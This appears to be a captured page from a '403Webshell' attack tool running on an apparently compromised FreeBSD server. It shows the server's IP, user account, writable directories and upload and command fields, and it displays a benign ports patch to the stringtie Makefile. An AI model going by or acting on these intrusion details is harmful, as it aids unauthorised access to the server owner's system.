403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.116
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/biology/stringtie/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/biology/stringtie/files/patch-Makefile
--- Makefile.orig	2020-01-26 03:31:12 UTC
+++ Makefile
@@ -20,7 +20,7 @@ ifeq "$(GCCVER8)" "1"
   BASEFLAGS += -Wno-class-memaccess
 endif
 
-LINKER  := $(if $(LINKER),$(LINKER),g++)
+LINKER  := $(if $(LINKER),$(LINKER),$(CXX))
 
 LDFLAGS := $(if $(LDFLAGS),$(LDFLAGS),-g)
 
@@ -151,7 +151,7 @@ rlink.o : rlink.h tablemaker.h $(GDIR)/G
 tmerge.o : rlink.h tmerge.h
 tablemaker.o : tablemaker.h rlink.h
 ${BAM}/libbam.a: 
-	cd ${BAM} && make lib
+	cd ${BAM} && ${MAKE} lib
 stringtie: ${BAM}/libbam.a $(OBJS) stringtie.o
 	${LINKER} ${LDFLAGS} -o $@ ${filter-out %.a %.so, $^} ${LIBS}
 	@echo
@@ -167,6 +167,6 @@ clean:
 	${RM} stringtie${EXE} stringtie.o*  $(OBJS)
 	${RM} core.*
 allclean cleanAll cleanall:
-	cd ${BAM} && make clean
+	cd ${BAM} && ${MAKE} clean
 	${RM} stringtie${EXE} stringtie.o* $(OBJS)
 	${RM} core.*

Youez - 2016 - github.com/yon3zu
LinuXploit